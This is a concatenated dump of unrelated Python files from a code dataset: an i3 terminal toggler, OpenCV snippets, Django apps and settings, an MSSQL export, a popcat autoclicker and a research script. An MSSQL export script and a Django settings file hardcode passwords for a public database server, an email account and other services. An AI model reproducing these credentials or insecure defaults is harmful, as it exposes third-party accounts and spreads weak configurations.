logging.debug('i3 cmd: %s' % cmd)\n conn.command(cmd)\n\n\ndef move_back(conn: i3ipc.Connection, selector: str) -> None:\n i3cmd(conn, '{} floating enable, move scratchpad'.format(selector))\n\n\ndef pop_it(conn: i3ipc.Connection,\n mark_name: str,\n pos: str = 'top',\n ratio: float = 0.25) -> None:\n assert pos in ('top', 'bottom')\n ws, _ = get_current_workspace(conn)\n wx, wy = ws['rect']['x'], ws['rect']['y']\n wwidth, wheight = ws['rect']['width'], ws['rect']['height']\n\n width = wwidth\n height = int(wheight*ratio)\n posx = wx\n\n if pos == 'bottom':\n margin = 6\n posy = wy + wheight - height - margin\n\n else: # pos == 'top'\n posy = wy\n\n i3cmd(conn, (\n '[con_mark={mark}],'\n 'resize set {width} px {height} px,'\n 'move absolute position {posx}px {posy}px,'\n 'move scratchpad,'\n 'scratchpad show'\n ).format(\n mark=mark_name,\n posx=posx,\n posy=posy,\n width=width,\n height=height\n )\n )\n\n\ndef get_current_workspace(\n conn: i3ipc.Connection) -> Tuple[i3ipc.WorkspaceReply, object]:\n \"\"\" Get the focused workspace.\n\n Returns\n -------\n A tuple in form (workspace, con), with the focused workspace and\n the container object for the focused workspace, respectively.\n \"\"\"\n ws = [w for w in conn.get_workspaces() if w['focused']][0]\n tree = conn.get_tree()\n ws_tree = [c for c in tree.descendents()\n if c.type == 'workspace' and c.name == ws['name']][0]\n\n return ws, ws_tree\n\n\ndef toggle_quickterm_select(conf: dict) -> None:\n \"\"\" Hide a quickterm visible on current workspace or prompt\n the user for a shell type.\n \"\"\"\n conn = i3ipc.Connection()\n ws, ws_tree = get_current_workspace(conn)\n\n # is there a quickterm opened in the current workspace?\n qt = ws_tree.find_marked(MARK_QT_PATTERN)\n if qt:\n qt = qt[0]\n move_back(conn, '[con_id={}]'.format(qt.id))\n return\n\n with get_history_file(conf) as hist:\n # compute the list from conf + (maybe) history\n hist_list = None\n\n if hist is not None:\n with suppress(Exception):\n hist_list = json.load(hist)\n\n # invalidate if different set from the configured shells\n if set(hist_list) != set(conf['shells'].keys()):\n hist_list = None\n\n shells = hist_list or sorted(conf['shells'].keys())\n\n proc = subprocess.Popen(expand_command(conf['menu']),\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE)\n\n for r in shells:\n proc.stdin.write((r + '\\n').encode())\n\n stdout, _ = proc.communicate()\n shell = stdout.decode().strip()\n\n if shell not in conf['shells']:\n return\n\n if hist is not None:\n # put the selected shell on top\n shells = [shell] + [s for s in shells if s != shell]\n hist.truncate(0)\n json.dump(shells, hist)\n\n toggle_quickterm(conf, shell)\n\n\ndef quoted(s: str, char: str = \"'\") -> str:\n return char + s + char\n\n\ndef term_title(shell: str) -> str:\n \"\"\" Returns a title for the given shell. \"\"\"\n return '{} - i3-quickterm'.format(shell)\n\n\ndef toggle_quickterm(conf: dict, shell: str) -> None:\n \"\"\" Toggles an existing drop-down terminal for the given shell, or starts\n one if it is not running.\n \"\"\"\n conn = i3ipc.Connection()\n tree = conn.get_tree()\n shell_mark = MARK_QT.format(shell)\n qt = tree.find_marked(shell_mark)\n\n # does it exist already?\n if len(qt) == 0:\n logging.debug('no existing terminal for mark %s' % shell_mark)\n term = TERMS.get(conf['term'], conf['term'])\n qt_cmd = expand_command(conf['shells'][shell])[0]\n title = term_title(shell)\n classname = conf['term'] + '-quickterm'\n term_cmd = ' '.join(expand_command(\n quoted(term),\n title=quoted(title, '\"'),\n class_name=quoted(classname, '\"'),\n expanded=qt_cmd,\n string=quoted(conf['shells'][shell])\n ))\n\n done = False\n\n def on_window_focus(conn: i3ipc.Connection, event: i3ipc.WindowEvent):\n nonlocal done\n window = event.container\n logging.debug('focused window: \"%s\"' % window.window_instance)\n\n # FIXME: instance isn't necessarily what we expect..\n if not done and (window.window_instance == classname or\n window.window_instance == conf['term']):\n done = True\n shell_mark = MARK_QT.format(shell)\n i3cmd(conn, 'mark {}'.format(shell_mark))\n move_back(conn, '[con_mark={}]'.format(shell_mark))\n pop_it(conn, shell_mark, conf['pos'], conf['ratio'])\n\n conn.on('window::focus', on_window_focus)\n i3cmd(conn, 'exec %s' % term_cmd)\n conn.main(timeout=2)\n\n else:\n qt = qt[0]\n ws, ws_tree = get_current_workspace(conn)\n move_back(conn, '[con_id={}]'.format(qt.id))\n\n if qt.workspace().name != ws.name:\n pop_it(conn, shell_mark, conf['pos'], conf['ratio'])\n\n\n@click.command()\n@click.option(\n '-v', '--verbose',\n count=True,\n default=0,\n help='Controls the verbosity level.',\n type=int,\n)\n@click.argument(\n 'shell',\n default=None,\n nargs=1,\n required=False,\n type=str,\n)\ndef main(verbose: int, shell: str) -> int:\n \"\"\" A small drop-down terminal for i3wm. \"\"\"\n # Initialise logger\n logging.basicConfig(\n format=(\n '[%(asctime)s.%(msecs)03d %(levelname)s]'\n ' %(name)s.%(funcName)s:%(lineno)s %(message)s'\n ),\n datefmt='%Y-%m-%d %H:%M:%S',\n level=(30 - verbose * 10),\n )\n\n # Read configuration\n conf = copy.deepcopy(DEFAULT_CONF)\n conf.update(read_conf(conf_path()))\n\n if shell is None:\n toggle_quickterm_select(conf)\n return 0\n\n if shell not in conf['shells']:\n logging.error(\n 'Unknown shell \"%s\" (available shells: %s)',\n shell,\n ', '.join(list(conf['shells'].keys()))\n )\n return 1\n\n toggle_quickterm(conf, shell)\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main.main(sys.argv[1:], standalone_mode=False))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"396364651","text":"import numpy as np\nimport cv2\n\ncap = cv2.VideoCapture(0)\n\nt0 = cap.read()[1]\nt1 = cap.read()[1]\n\n# 將此兩張影像分別進行灰階及高斯模糊處理\ngray1 = cv2.cvtColor(t0, cv2.COLOR_BGR2GRAY)\ngray2 = cv2.cvtColor(t1, cv2.COLOR_BGR2GRAY)\n\nblur1 = cv2.GaussianBlur(gray1,(7,7),0)\nblur2 = cv2.GaussianBlur(gray2,(5,5),0)\n\n# 使用cv2.absdiff計算並得出兩張影像的差異圖形\nd = cv2.absdiff(blur1, blur2)\n\n# 將差異圖形進行二值化處理(即黑白化)\nret, th = cv2.threshold( d, 10, 255, cv2.THRESH_BINARY )\n\n# 使用cv2.dilate進行擴張處理,可避免當移動速度過快差異不顯著時加強\ndilated=cv2.dilate(th, None, iterations=1)\n\ncontours, hierarchy = cv2.findContours(dilated,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\nareas = [cv2.contourArea(c) for c in contours]\n\nmax_index = np.argmax(areas)\n\ncnt=contours[max_index]\n\nx,y,w,h = cv2.boundingRect(cnt)\n\ncv2.drawContours(layer, cnt, -1, markColor, 2)\n\ncv2.rectangle(layer,(x,y),(x+w,y+h), markColor,2)\n\nCutted = t0[y:y + h, x:x + w]\n\nlayer = layer[y:y + h, x:x + w]\n","sub_path":"opencv/hand_0605/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"514396981","text":"# Running this as a command didn't work, but running it manually in the shell did.\nimport csv\nfrom backend.models import TtsEntry\n\nwith open('data_aug27.csv') as f:\n reader = csv.DictReader(f)\n for row in reader:\n obj, created = TtsEntry.objects.get_or_create(\n customer_number=row['customer_number'],\n day_part=row['day_part'],\n first_seen_local=row['first_seen_local'],\n first_seen_utc=row['first_seen_utc'],\n misc_id=row['id'],\n location=row['location'],\n model_id=row['model_id'],\n total_time_to_service=row['tts'],\n )","sub_path":"upload_data.py","file_name":"upload_data.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"246890780","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom selenium import webdriver\nimport pyautogui as py \nimport pandas as pd\nimport time\nfrom threading import Thread\n\n\n# In[2]:\n\n\nfrom pynput import keyboard\n\n\n# In[ ]:\n\n\nbrowser = webdriver.Chrome(executable_path=r'/Users/Yew Choong/Downloads/chromedriver_win32/chromedriver')\nbrowser.maximize_window()\nbrowser.get(\"https://popcat.click/\")\ntime.sleep(3)\n\n\n# In[ ]:\n\n\ndef exit_program():\n def on_press(key):\n if str(key) == 'Key.esc':\n main.status = 'pause'\n user_input = input('Program paused, would you like to continue? (y/n) ')\n\n while user_input != 'y' and user_input != 'n':\n user_input = input('Incorrect input, try either \"y\" or \"n\" ')\n\n if user_input == 'y':\n main.status = 'run'\n elif user_input == 'n':\n main.status = 'exit'\n exit()\n\n with keyboard.Listener(on_press=on_press) as listener:\n listener.join()\n\n\n# In[ ]:\n\n\ndef main():\n main.status = 'run'\n\n while True:\n py.click(x=705,y=400,interval=0.005)\n\n while main.status == 'pause':\n time.sleep(1)\n\n if main.status == 'exit':\n print('Main program closing')\n break\n\n\n# In[ ]:\n\n\nThread(target=main).start()\nThread(target=exit_program).start()\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"416662977","text":"#coding=utf-8\nimport _mssql\nimport json\n\nimport sys\n\nimport sys\ndefault_encoding = 'utf-8'\nif sys.getdefaultencoding() != default_encoding:\n reload(sys)\n sys.setdefaultencoding(default_encoding)\n\n\n\nimport xlwt, xlrd\nfrom datetime import datetime\n\n\n\n\n\ndef getAllCountry():\n conn = _mssql.connect(server='101.201.47.50', user='sa', password='Investarget@2016', )\n # SELECT 短链接查询操作(一次查询将所有数据取出)\n sql = \"SELECT [User].Id,[User].Name,Organization.Name,Title.TitleC, [User].Mobile,[User].EmailAddress,[User].PartnerName FROM InvestargetDb_v2.dbo.[User]INNER JOIN InvestargetDb_v2.dbo.Organization ON [User].OrganizationId = Organization.Id INNER JOIN InvestargetDb_v2.dbo.Title ON [User].TitleId = Title.Id WHERE [User].OrganizationId IS NOT NULL AND [User].IsDeleted = 0 AND [User].Id IN (SELECT UserCommonTransaction.UserId FROM InvestargetDb_v2.dbo.UserCommonTransaction WHERE [UserCommonTransaction].IsDeleted = 0)\"\n conn.execute_query(sql)\n res = []\n for area in conn:\n res.append(area)\n conn.close()\n return res\n\ndef saveToFile(res):\n style0 = xlwt.easyxf('font: name Times New Roman, color-index red, bold on')\n\n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet('A Test Sheet')\n\n\n hang = 0\n for row in res:\n lie = 0\n\n tags = getUserTag(row[0])\n remarks = getUserRemark(row[0])\n ws.write(hang, lie, str(row[1]))\n ws.write(hang, lie + 1, str(row[2]))\n ws.write(hang, lie + 2, str(row[3]))\n ws.write(hang, lie + 3, str(row[4]))\n ws.write(hang, lie + 4, str(row[5]))\n ws.write(hang, lie + 5, str(row[6]))\n ws.write(hang, lie + 6, tags)\n ws.write(hang, lie + 7, remarks)\n\n\n # f = open('user-1.txt', 'a')\n # f.writelines(str(row[1])+';'+str(row[2])+';'+str(row[3])+';'+str(row[4])+';'+str(row[5])+';'+str(row[6])+';'+tags+';'+remarks)\n # f.writelines('\\n')\n # f.close()\n hang = hang + 1\n wb.save('test.xls')\n\n\n\n\ndef getTags():\n conn = _mssql.connect(server='101.201.47.50', user='sa', password='Investarget@2016', )\n # SELECT 短链接查询操作(一次查询将所有数据取出)\n sql = \"SELECT User_Tags.UserId,Tag.TagNameC FROM InvestargetDb_v2.dbo.Tag INNER JOIN InvestargetDb_v2.dbo.User_Tags ON User_Tags.TagId = Tag.Id AND User_Tags.IsDeleted = 0\"\n conn.execute_query(sql)\n res = []\n for area in conn:\n res.append(area)\n conn.close()\n return res\n\n\ndef getRemarks():\n conn = _mssql.connect(server='101.201.47.50', user='sa', password='Investarget@2016', )\n # SELECT 短链接查询操作(一次查询将所有数据取出)\n sql = \"SELECT UserId,Remark FROM InvestargetDb_v2.dbo.UserRemarks WHERE UserRemarks.IsDeleted = 0\"\n conn.execute_query(sql)\n res = []\n for area in conn:\n res.append(area)\n conn.close()\n return res\n\nallremarks = getRemarks()\nallTags = getTags()\n\ndef getUserTag(userid):\n res = []\n for remark in allTags:\n if userid == remark[0]:\n res.append(remark[1])\n return '、'.join(res)\n\n\ndef getUserRemark(userid):\n res = []\n for remark in allremarks:\n if int(userid) == int(remark[0]):\n remarka = remark[1].replace('\\n', ' ').replace(';', '、')\n res.append(remarka)\n return '*'.join(res)\n\nsaveToFile(getAllCountry())\n\n","sub_path":"python/emptygit/saveExcel/user_trader.py","file_name":"user_trader.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"507865486","text":"from django.db.models.signals import post_save, post_delete\nfrom django.dispatch import receiver\nfrom channels.layers import get_channel_layer\nfrom asgiref.sync import async_to_sync\nfrom django.contrib.auth.models import User\nfrom django.template.loader import render_to_string\nfrom .models import Profile\n\n@receiver(post_delete,sender=User)\n@receiver(post_save, sender=User)\ndef change_user(sender, instance, *args, **kwargs):\n\tusers = User.objects.all()\n\thtml_users = render_to_string(\"includes/users.html\",{'users':users,'currect_user':instance.username})\n\n\tchannel_layer = get_channel_layer()\n\tasync_to_sync(channel_layer.group_send)(\n\t\t\"users\",\n\t\t{\n\t\t\t\"type\":\"user_update\",\n\t\t\t\"event\":\"New User\",\n\t\t\t'html_users': html_users,\n\t\t}\n\t)\n\n@receiver(post_save, sender=User)\ndef new_user(sender, instance, created, **kwargs):\n\tif created:\n\t\tProfile.objects.create(user=instance)\n\t\t\n\t\t","sub_path":"accounts/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"200498283","text":"import pandas as pd\nimport numpy as np\n\n\n\ndef output(test_Y,file_name):\n df_out = pd.DataFrame()\n test_csv = './data/test.csv'\n df_test = pd.read_csv(test_csv, header=0)\n arr_test = df_test.values\n test_ID = arr_test[0::,0]\n test_ID=test_ID.astype(int)\n df_out['id'] = test_ID\n df_out['response'] = test_Y\n df_out.to_csv('./results/'+file_name,index=False)\n\n","sub_path":"output_results.py","file_name":"output_results.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"525662957","text":"#-*-coding:utf-8-*-\n\"\"\"\nSolve a loan example using the constrained cross-entropy method\n\"\"\"\n\n\"\"\" Hyperparameters:\n In transition function:\n epsilon: Parameter in transition function when a = 0\n In reward function:\n lamda: trade-off parameter between the mean and the variance, positive\n I: the interest collected on the loan if repaid, positive\n P: the principal of the loan, positive\n In initial distribution:\n pZ: the parameter in initial state distribution\n alpha0, beta0, alpha1, beta0: parameters in initial states\n\"\"\"\n\nimport time, os, sys, logging\nimport tensorflow as tf\nimport numpy as np\nfrom shutil import copy2\n\nimport policyNetwork\nimport constrainedCEM\nimport envLoan\n\nfile_name_base = time.ctime()\nfile_name_base = file_name_base.replace(' ', '-')\nfile_name_base = file_name_base.replace(':', '-')\n\nbase_folder = \"/home/min/PycharmProjects/fairness/\"\n\nlog_folder = base_folder + \"EO_\" + file_name_base\n\nif not os.path.exists(log_folder):\n os.makedirs(log_folder)\n\nroot_folder = base_folder + \"venv\"\ncopy2(root_folder + '/CEM_loan_v2.py', log_folder)\ncopy2(root_folder + '/envLoan.py', log_folder)\ncopy2(root_folder + '/policyNetwork.py', log_folder)\ncopy2(root_folder + '/constrainedCEM.py', log_folder)\n\n\"\"\"Set up the logging part\"\"\"\nlogging.getLogger().setLevel(logging.ERROR)\n# logger = logging.getLogger(__name__)\nlogger = logging.getLogger(\"CEM_loan\")\nlogger.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s [%(funcName)s:%(lineno)i] %(message)s',\n datefmt=\"%Y/%m/%d %H:%M:%S\")\n\nfh = logging.FileHandler(filename= log_folder + \"/\" + file_name_base + \"_console.log\", mode='a')\nfh.setLevel(logging.INFO)\nfh.setFormatter(formatter)\nlogger.addHandler(fh)\n\nch = logging.StreamHandler(sys.stdout)\nch.setLevel(logging.INFO)\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n\"\"\"Main program\"\"\"\nsess = tf.InteractiveSession()\nsess.run(tf.initializers.global_variables())\n\n\"\"\"Hyperparameters\"\"\"\naction_dim = 1\nstate_dim = 3\n\nrho = .1\n\nh = 50\ngamm = .8\n\n\"h0 is the number of steps to simulate to get the initial distribution for group 0 (with action 1)\"\n\"h1 is the number of steps to simulate to get the initial distribution for group 1 (with action 1)\"\n\"For z = 0, 1, there will be (hz+1) initial states\"\n# h0 = 1\n# h1 = 3\n# h0 = 1\n# h1 = 5\nh0 = 7\nh1 = 10\n\nn_samples = 50\nnl = 49\n\nalpha0 = 1.4614873\nbeta0 = 0.51479711\n\nalpha1 = 1.51578208\nbeta1 = 0.19009129\n\n# equal_opp_thres = 0.85237955\nequal_opp_thres = 0.82\n\npZ = 1-0.29294318\nI = 0.17318629\n# I = 0.041225\nP = 1\nlamda = .01\n# lamda = 0.1\nepsilon = .1 # don't change this\n\npolicy_net_struct = [25, 25]\n\nlogger.info(\"state_dim = \"+str(state_dim)+\", action_dim = \"+str(action_dim))\nlogger.info(\"rho = \"+str(rho)+\", h = \"+str(h)+\", n_samples = \"+str(n_samples)+\", epsilon = \"+str(epsilon)+\n \", nl = \"+str(nl))\nlogger.info(\"alpha0 = \"+str(alpha0)+\", beta0 = \"+str(beta0)+\", alpha1 = \"+str(alpha1)+\", beta1 = \"+str(beta1))\nlogger.info(\"pZ = \"+str(pZ)+\", I = \"+str(I)+\", P = \"+str(P)+\", lamda = \"+str(lamda)+\", gamm = \"+str(gamm))\n\nlogger.info(\"The policy network: \"+str(policy_net_struct))\n\n\"\"\"\nIn version0: the policy network takes 2 inputs: alpha/(alpha+beta) and z.\nIn version1: the policy network takes 3 inputs: alpha/(alpha+beta), alpha-beta, z.\n\"\"\"\npolicy = policyNetwork.PolicyNetwork(3, policy_net_struct)\nenv = envLoan.EnvLoan(state_dim, action_dim, h, epsilon, alpha0, alpha1, beta0, beta1, pZ, I, P, lamda, gamm, h1, h0)\n\n# print(env.set_init_state())\n\nagent = constrainedCEM.ConstrainedCEM(env, policy, n_samples, h, rho, nl, sess, equal_opp_thres, log_folder)\n\n# agent.train_demographic_parity()\nagent.train_equality_of_opportunity(equal_opp_thres)\n# agent.train_optimistic()\n# agent.train_race_blind()\n","sub_path":"venv/CEM_loan_v2.py","file_name":"CEM_loan_v2.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"560825710","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport ROOT\nimport json\nimport pickle\nimport os\n\nfrom DataFormats.FWLite import Events, Handle\nfrom Analysis.HLTAnalyserPy.EvtData import EvtData, EvtHandles,phaseII_products,add_product\n\nimport Analysis.HLTAnalyserPy.CoreTools as CoreTools\n\nclass PythonObjectEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, (list, dict, str, unicode, int, float, bool, type(None))):\n return json.JSONEncoder.default(self, obj)\n return {'_python_object': pickle.dumps(obj)}\n\ndef as_python_object(dct):\n if '_python_object' in dct:\n return pickle.loads(str(dct['_python_object']))\n return dct\n\n\n\nclass PUEventsInBX(object):\n def __init__(self,pu_sum):\n self.evt_ids = {x for x in pu_sum[3].getPU_EventID()}\n \n def overlap(self,rhs):\n return self.evt_ids.intersection(rhs.evt_ids)\n \n def nr_overlap(self,rhs):\n return len(self.overlap(rhs))\n \ndef read_pileup(in_filenames,prefix,maxevents=-1,verbose=False):\n\n products = []\n add_product(products,\"pu_sum\",\"std::vector0 and eventnr>maxevents:\n break\n\n evtdata.get_handles(event)\n pu_sum = evtdata.get(\"pu_sum\")\n\n# pu_list.append(PUEventsInBX(pu_sum))\n pu_list.append({(x.event(),x.luminosityBlock()) for x in pu_sum[3].getPU_EventID()})\n\n return pu_list\n\nif __name__ == \"__main__\":\n \n CoreTools.load_fwlitelibs()\n\n parser = argparse.ArgumentParser(description='example e/gamma HLT analyser')\n parser.add_argument('in_filenames',nargs=\"+\",help='input filename')\n parser.add_argument('--prefix','-p',default='file:',help='file prefix')\n parser.add_argument('--maxevents','-n',default=-1,help='max events, <0 is no limit')\n parser.add_argument('--verbose','-v',action='store_true',help='verbose printouts')\n parser.add_argument('--out','-o',default='output.json',help='output file')\n parser.add_argument('--out_root','-r',default='output.root',help='output root file')\n args = parser.parse_args()\n\n if not os.path.exists(args.out):\n print(\"reading output\")\n pu_list = read_pileup(args.in_filenames,args.prefix,args.maxevents,args.verbose)\n \n with open(args.out,'w') as f:\n json.dump(pu_list,f,cls=PythonObjectEncoder)\n \n with open(args.out,'r') as f:\n pu_list = json.load(f,object_hook=as_python_object)\n \n\n ref_event_nr = 0\n ref_event = pu_list[ref_event_nr]\n pu_list.pop(ref_event_nr)\n\n root_file = ROOT.TFile(args.out_root,\"RECREATE\")\n hist = ROOT.TH1D(\"overlapHist\",\"# in time PU events overlapping with a given event;# overlap PU events;#events\",251,-0.5,250.5)\n\n for event in pu_list:\n nr_overlap = len(ref_event.intersection(event))\n hist.Fill(nr_overlap)\n root_file.Write()\n\n\n","sub_path":"HLTAnalyserPy/test/getPUEvtsForEachEvt.py","file_name":"getPUEvtsForEachEvt.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"450806961","text":"# coding:utf-8\n# Django settings for hellouser project.\nimport sys\nimport os\n\n\nANONYMOUS_USER_ID = -1\n\nAUTH_PROFILE_MODULE = 'accounts.MyProfile'\n\nLOGIN_REDIRECT_URL = '/accounts/%(username)s/'\nLOGIN_URL = '/accounts/signin/'\nLOGOUT_URL = '/accounts/signout/'\n\n\n# SITE_ROOT = os.path.join(os.path.realpath(os.path.dirname(__file__)), '../../')\n\n\n# MEDIA_URL = 'http://192.168.1.114:8888/'\n# STATIC_URL = '/static/'\n# MEDIA_ROOT = os.path.join(SITE_ROOT, 'media')\n# STATIC_ROOT = os.path.join(SITE_ROOT, 'static')\n# TEMPLATE_DIRS = [os.path.join(SITE_ROOT, 'pinry/templates')]\n# STATICFILES_DIRS = [os.path.join(SITE_ROOT, 'pinry/static')]\n\n\nsettings_dir = os.path.dirname(__file__)\nPROJECT_ROOT = os.path.abspath(os.path.dirname(settings_dir))\n# print PROJECT_ROOT\n\n# PROJECT_ROOT = os.path.join(os.path.realpath(os.path.dirname(__file__)), '../../')\n\nADMINS = (\n # ('Your Name', 'your_email@example.com'),\n)\n\nugettext = lambda s: s\n\n# LOCALE_PATHS = (\n# os.path.join(PROJECT_ROOT, 'locale'),\n# )\n\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\n\nTIME_ZONE = 'Asia/Shanghai'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nLANGUAGE_CODE = 'zh-cn'\n\nADMINS = (\n # ('Your Name', 'your_email@example.com'),\n)\n\nMANAGERS = ADMINS\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'pinry',\n 'USER': 'root',\n 'PASSWORD': 'root',\n 'HOST': '192.168.1.117',\n # 'PASSWORD': 'bj8888',\n 'PORT': '5432',\n }\n}\n\n\nSECRET_KEY = '20061212'\n\n\nGRIDFS = {\n 'HOST': '192.168.1.117',\n 'PORT': 27017,\n 'DB': 'adleida',\n}\n\n# Hosts/domain names that are valid for this site; required if DEBUG is False\n# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\nALLOWED_HOSTS = []\n\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\n# USE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale.\n# USE_L10N = True\n\n# If you set this to False, Django will not use timezone-aware datetimes.\n# USE_TZ = True\n\n\nMEDIA_URL = '/resources/'\n\nMEDIA_ROOT = os.path.join(PROJECT_ROOT, 'media')\n# MEDIA_URL = '/media/'\n\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')\n# print STATIC_ROOT\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(PROJECT_ROOT, 'pinry/static/'),\n)\n\n\nTEMPLATE_DIRS = (\n os.path.join(PROJECT_ROOT, 'pinry/templates/'),\n)\n\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n \n 'compressor.finders.CompressorFinder'\n)\n\n# Make this unique, and don't share it with anybody.\n# SECRET_KEY = '3k8(%b!ptvdq7)_05nob(i^15$-s(^2%p-ls=@mwh4t_^^!v3g'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'pinry.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'wsgi.application'\n\n\n\n# MESSAGE_TAGS = {\n# messages.WARNING: 'alert alert-warning',\n# messages.ERROR: 'alert alert-danger',\n# messages.SUCCESS: 'alert alert-success',\n# messages.INFO: 'alert alert-info',\n# }\n\nAPI_LIMIT_PER_PAGE = 20\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n # Uncomment the next line to enable the admin:\n 'django.contrib.admin',\n # Uncomment the next line to enable admin documentation:\n 'django.contrib.admindocs',\n\n 'south',\n 'taggit',\n 'compressor',\n 'django_images',\n 'pinry.core',\n # 'pinry.users',\n 'pinry.ads',\n\n # 'pinry.userena',\n 'guardian',\n # 'easy_thumbnails',\n 'pinry.newuser',\n)\n\nIMAGE_PATH = 'pinry.core.utils.upload_path'\nIMAGE_SIZES = {\n 'thumbnail': {'size': [240, 0]},\n 'standard': {'size': [600, 0]},\n 'square': {'crop': True, 'size': [125, 125]},\n}\n\n#很关键的一句'pinry.core.context_processors.template_settings'为setting传到模板\n#下面的几句结合TemplateView.as_view\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n 'pinry.core.context_processors.template_settings',\n #上面一句向base.html传值settings.API_LIMIT_PER_PAGE\n)\n\n\nSESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n\nAUTHENTICATION_BACKENDS = (\n # 'userena.backends.UserenaAuthenticationBackend',\n 'guardian.backends.ObjectPermissionBackend',\n 'django.contrib.auth.backends.ModelBackend',\n )\n\n\n# Email settings\nEMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend'\n\nEMAIL_HOST = 'smtp.163.com'\nEMAIL_PORT = 25\nEMAIL_HOST_USER = 'pythontake@163.com'\nEMAIL_HOST_PASSWORD = 'T78325694'\nEMAIL_USE_TLS = True\nDEFAULT_FROM_EMAIL = EMAIL_HOST_USER \n\n\n# APPEND_SLASH = False\n\nTASTYPIE_SWAGGER_API_MODULE = 'api.urls.v3'\n","sub_path":"adleida_web_site/pinry/pinry/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
